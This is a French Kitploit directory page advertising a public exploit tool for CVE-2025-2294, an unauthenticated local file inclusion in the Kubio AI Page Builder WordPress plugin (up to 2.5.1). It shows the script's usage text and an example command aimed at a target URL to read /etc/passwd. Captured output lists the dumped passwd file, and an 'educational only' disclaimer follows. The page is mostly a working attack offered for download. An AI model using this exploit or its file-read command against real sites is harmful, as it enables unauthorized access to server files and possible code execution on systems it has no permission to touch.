Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2294 — Kubio AI Page Builder <= 2.5.1 - Inclusion de fichier local non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-2294
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-2294

CVE-2025-2294

Kubio AI Page Builder <= 2.5.1 - Inclusion de fichier local non authentifiée

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Kubio AI Page Builder <= 2.5.1 - Inclusion de fichier local non authentifiée

📝 Description

Le plugin Kubio AI Page Builder pour WordPress est vulnérable à une inclusion de fichier local dans toutes les versions jusqu'à la 2.5.1 incluse via la fonction kubio_hybrid_theme_load_template. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter des fichiers arbitraires sur le serveur, permettant l'exécution de tout code PHP dans ces fichiers. Cela peut être utilisé pour contourner les contrôles d'accès, obtenir des données sensibles, ou réaliser une exécution de code dans les cas où des images et d'autres types de fichiers « sûrs » peuvent être téléchargés et inclus.

  • CVE: CVE-2025-2294
  • CVSS : 9.8 (Critique)
  • Publié publiquement : 27 mars 2025
  • Dernière mise à jour : 27 mars 2025

💥 Détails de l'exploit

Ce script exploite la vulnérabilité du plugin Kubio AI Page Builder pour inclure et exécuter des fichiers arbitraires sur le serveur. L'exploit permet à des attaquants non authentifiés de lire des fichiers sensibles sur le serveur.

⚙️ Prérequis

  • Python 3.x
  • Bibliothèque requests

🚀 Utilisation

root@kitploit:~
usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)

📋 Exemple

root@kitploit:~
python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd

🔍 Sortie

root@kitploit:~
[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


⚠️ Avertissement

Cet exploit est fourni à des fins éducatives uniquement. L'auteur n'est pas responsable de toute mauvaise utilisation de cet outil. Utilisez-le à vos propres risques.

Par : Nxploited | Khaled Alenazi

Télécharger l’outil